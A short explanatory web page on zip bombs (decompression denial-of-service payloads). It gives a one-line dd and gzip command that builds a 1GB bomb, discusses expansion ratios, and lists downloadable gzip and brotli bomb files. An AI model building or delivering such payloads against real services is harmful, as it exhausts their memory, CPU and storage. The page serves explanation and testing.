zipbomb.me

what is a zip bomb?

A zipbomb is a type of denial-of-service attack that takes advantage of the compression ratio of a compression algorithm to create a payload that expands to a large size when uncompressed. This effect may impact the performance of software processing the file (consuming CPU cycles, exhausing memory, consuming storage space, etc.).

make your own zipbombs

Zipbombs can be trivially produced by sending a stream of uniform bytes through a compression algorithm. For example, passing 1GB of '\x00' to gzip (with the -9 flag to select the best compression ratio):

  dd if=/dev/zero bs=1GB count=1 | gzip -9 > 1gb.gz

You can check the size of the output:

  du -h 1gb.gz                  # compressed file size
  gzip -d -k 1gb.gz -c | wc -c  # count uncompressed bytes

compression ratios

A zipbomb author might choose to maximize the ratio between payload size in compressed vs. uncompressed format to allow sending the payload over size-limited or bandwidth-constrained channels. As an example, a 1GB payload might be gziped to only 948KB, which yields a 1055x expansion factor.

Not all compression algorithms are created equal. Some algorithms are optimized for images, videos, or other media and better compression ratios might be achieved by mimicking the structure they are optimized for.

available payloads

gzip bombs

• 1gb.gz (948KB compressed)
• 10gb.gz (9.3MB compressed)
• 100gb.gz (93MB compressed)

brotli bombs

• 1gb.brotli ( compressed)
• 10gb.brotli ( compressed)
• 100gb.brotli (X compressed)

zipbomb.me by Austin Hartzheim is licensed under CC BY-NC-SA 4.0